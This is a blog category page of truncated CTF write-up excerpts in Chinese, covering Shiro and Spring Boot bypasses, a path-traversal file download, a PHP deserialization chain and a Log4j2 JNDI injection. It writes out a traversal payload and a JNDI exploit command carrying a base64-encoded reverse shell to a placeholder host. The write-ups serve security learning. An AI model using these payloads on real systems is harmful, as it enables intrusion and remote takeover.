![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
writerup
文章平均质量分 61
b1ackc4t
这个作者很懒,什么都没留下…
展开
-
[红明谷CTF 2021]JavaWeb
进入网站从报错信息和图标能明显看出是一个springboot应用题目给了/login 我们访问试一试根据响应结果我们再访问/json试一试可以看到响应头location的url,能够判断它使用了shiro身份验证框架我们可以尝试shiro的公开漏洞 CVE-2020-11989https://blog.csdn.net/weixin_39811856/article/details/109847284成功访问,但是报错了,这里面对springboot有个技巧springboot对原创 2022-02-05 20:34:31 · 551 阅读 · 0 评论 -
[网鼎杯 2020 青龙组]filejava
任意文件下载入眼是一个上传框,我们先随意上传一个正常图片试试水拿到文件下载地址,尝试一下能否任意文件下载抓下载的包尝试目录穿越成功下载web.xml的内容所有class文件都在**/WEB-INF/classes**继续下载所有的class文件,注意不要忘了class后缀/DownloadServlet?filename=..%2f..%2f..%2f..%2fWEB-INF%2fclasses%2fcn%2fabc%2fservlet%2fDownloadServlet.class原创 2022-01-27 17:45:59 · 746 阅读 · 0 评论 -
[GYCTF2020]Easyphp
知识点反序列化pop链反序列化字符逃逸解题过程www.zip 备份文件获取源码审计代码构造pop链<?phpClass UpdateHelper{ public $id; public $newinfo; public $sql;}class User{ public $id; public $age; public $nickname; public function __toString() {原创 2022-01-24 10:42:06 · 2077 阅读 · 0 评论 -
2022 Real World CTF 体验赛 writeup
log4flag最近风靡全球的log4j2漏洞,加了一个正则过滤用log4j自带的语法便轻松绕过,然后常规jndi注入攻击,需要一台在公网的vps在自己vps上使用工具搭建ldap服务https://github.com/welk1n/JNDI-Injection-Exploitjava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94LngueC54LzE原创 2022-01-23 14:03:06 · 1800 阅读 · 0 评论 -
UNCTF2020 web writeup
1.Easy_ssrf给了file_get_contents,直接读取flag即可2.Easyunserialize利用点在构造uname反序列化逃逸即可3.Babyeval两个过滤,绕过括号和flag即可用include绕过Base64解码得到flag4.Easyflask开局让我以管理员登陆盲猜有/login,随便输入账号密码提示我去/register注册注册个adm...原创 2020-11-18 18:18:17 · 508 阅读 · 1 评论 -
2020第十三届全国大学生信息安全竞赛创新实践能力赛rceme writerup
审计代码传入参数a,进入parserIfLabel函数发现参数a的模板,a的格式要匹配pattern,如{if:payload}{end if}可知ifstr是a中匹配的第一组的值,即payload中的值并且经过danger_key函数过滤继续往下看Ifstr经过很多过滤替换,最终里面不包含大括号就会进入一个eval语句漏洞正是出现在这里往回看danger_key过滤函数好家伙,不仅将一大堆关键字符替换成*,还进行了二次检查但是...原创 2020-08-21 23:32:22 · 3486 阅读 · 5 评论